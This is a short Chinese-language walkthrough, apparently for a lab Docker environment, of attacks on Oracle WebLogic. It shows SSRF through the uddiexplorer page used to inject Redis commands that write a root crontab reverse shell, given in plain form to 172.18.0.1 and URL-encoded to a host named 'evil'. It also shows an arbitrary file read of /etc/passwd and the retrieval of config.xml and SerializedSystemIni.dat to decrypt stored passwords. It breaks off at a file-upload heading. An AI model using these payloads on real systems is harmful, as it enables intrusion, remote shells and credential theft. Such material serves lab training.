Weblogic

weblogic  ssrf

docker-compose up -d

访问：ip+端口/uddiexplorer/SearchPublicRegistries.jsp

burp抓包发现有对外网址的请求，我们将其更改为内网127.0.0.1：7001，127.0.0.1：7000，其中7001端口是有的，发包发现返回包的时间长度不一样基本可以判断存在ssrf了.

在这漏洞处存在的话响应包存在returned a 404 error code.

注入http头，利用redis反弹shell：

将如下脚本通过url编码

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/172.18.0.1/21 0>&1'\n\n\n\n" config set dir /etc/ config set dbfilename crontab save

编码后如下：

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

换请求包发送过去.

文件读取漏洞：

访问http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件

weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml，在本环境中为./security/SerializedSystemIni.dat和./config/config.xml      构造   /hello/file.jsp?path=config/config.xml ，  /hello/file.jsp?path=security/SerializedSystemIni.dat

文件上传